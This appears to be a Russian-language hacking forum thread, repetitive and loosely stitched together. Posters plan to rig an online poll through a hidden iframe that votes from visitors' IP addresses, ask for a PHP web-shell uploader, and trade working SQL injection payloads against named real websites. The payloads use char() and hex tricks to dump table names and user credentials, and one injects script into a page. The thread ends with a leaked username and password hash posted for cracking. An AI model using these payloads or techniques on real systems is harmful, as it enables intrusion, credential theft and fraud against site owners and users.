Так вот. На определённом сайтике есть опрос, где нужно "продвинуть" один из вариантов ответа. Так как голосовать на сайте можно из инета (всмысле из всего инета, а не из сетки), но так как с одного адреса (скорее всего IP) многоразовое голосование блокируется, то идея вобщем баяновская: создать страничку в сети не по теме, где во фрейме нулевого размера шла бы переадресация на этот опрос с нужным вариантом ответа (типа чел там ответил). Но вот проблема заключается в том, что я не знаю как этот вариант ответа передаётся. Как это можно выяснить?

Firefox Http Headers
Php Curl
Iframe

AkyHa_MaTaTa>> ну ти прав на що того что кавычки слешыруюца.. но насколько помню есть обход.. я вот только прызабыл где то я ето видел вот и выклал скуль чтоб ктото может поможет).

1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME='all _logins')--
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 3: Incorrect syntax near 'all_logins'.

1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME=char (97)+char(108)+char(108)+char(95)+char(108)+char(1 11)+char(103)+char(105)+char(110)+char(115))--
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 3: Incorrect syntax near 'char'.
как решить?)

2 Micr0b:

есть, например %27, но тогда нет ошибки mysql, т.е. ошибку можно вызвать только когда кавычка в чистом виде, нет ошибки - нет скули

ЗЫЖ По идее:)

2Pashkela
если ты это мне то 1+or+1=@@version выводит
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
вывел все таблицы а столбцы не получается из за выше написанного(
а скуль это внедрение и выполнение sql-кода) а не ошибки выполнение скрипта)
зы. вроде правильно)

Нужен скриптик на пхп
Чтобы когда зашол на страницу то заметно заливался шелл на сайт
путь до сайта знаю

up

1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME='all _logins')--


1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME=char (97)+char(108)+char(108)+char(95)+char(108)+char(1 11)+char(103)+char(105)+char(110)+char(115))--

как решить?)

Чарить надо так:

char(97)%2Bchar(108)%2Bchar(108)%2Bchar(95)%2Bchar (108)%2Bchar(111)%2Bchar(103)%2Bchar(105)%2Bchar(1 10)%2Bchar(115)

2R1dex
спс) работает) а для общего развития можешь обьяснить почему так "заработало"?)

2R1dex
спс) работает) а для общего развития можешь обьяснить почему так "заработало"?)
Просто + в урле - это пробел, %2B - это +
--------
Лудше переводи в число (в твоем случае - 0x616c6c205f6c6f67696e73) - так короче запрос получается

Нужен скриптик на пхп
Чтобы когда зашол на страницу то заметно заливался шелл на сайт
путь до сайта знаю
Ты толком можешь объяснить? Через что заливать? Инъекция? Файл_прив включен? Толку с того, что путь знаешь...

AkyHa_MaTaTa>> ну ти прав на що того что кавычки слешыруюца.. но насколько помню есть обход.. я вот только прызабыл где то я ето видел вот и выклал скуль чтоб ктото может поможет).
а вот нифига я и не прав, твой сайт у меня не открываеться,приведу пример на другом,
судя по всему слеш добавляеться после, уязвимый запрос наверно идет в стату судя по возврашаемой ошибке(убераем слеши):

UPDATE gmm_fb_whoisonline SET time='1236096331', what='Sv:VPS', do= '', task= '', link= '/index.php?option=com_fireboard&func=view&catid=7&id=20315'(сдесь возможен иньект), func= 'view'
WHERE userid='0' AND userip='70.***.66.***'

то есть например вот так можно вставить в стату пароль и хеш пользователя:

http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=(select/**/concat_ws(0x3A,username,password)/**/from/**/gmm_users/**/limit/**/1)/**/WHERE/**/userid/**/LIKE/**/'%%'/*
или javascript

http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=0x27223e3c7363726970743e616c6572742 82727293c2f7363726970743e/**/WHERE/**/userid/**/LIKE/**/'%%'/*

правдо я хз как оно там дальше выводиться в стате, может скрипты режуться.

http://www.turistka.ru/altai/mail.php?firm=-1%20union%20select%20username,user_password,3,4%20 from%20bb_users%20limit%201,1--
SAN
d32f227fabf9c471fcceb0f12d8a626d (Нужно расшифровать с меня +_)
pr 4

Хеши не тут расшифровывать..

sss113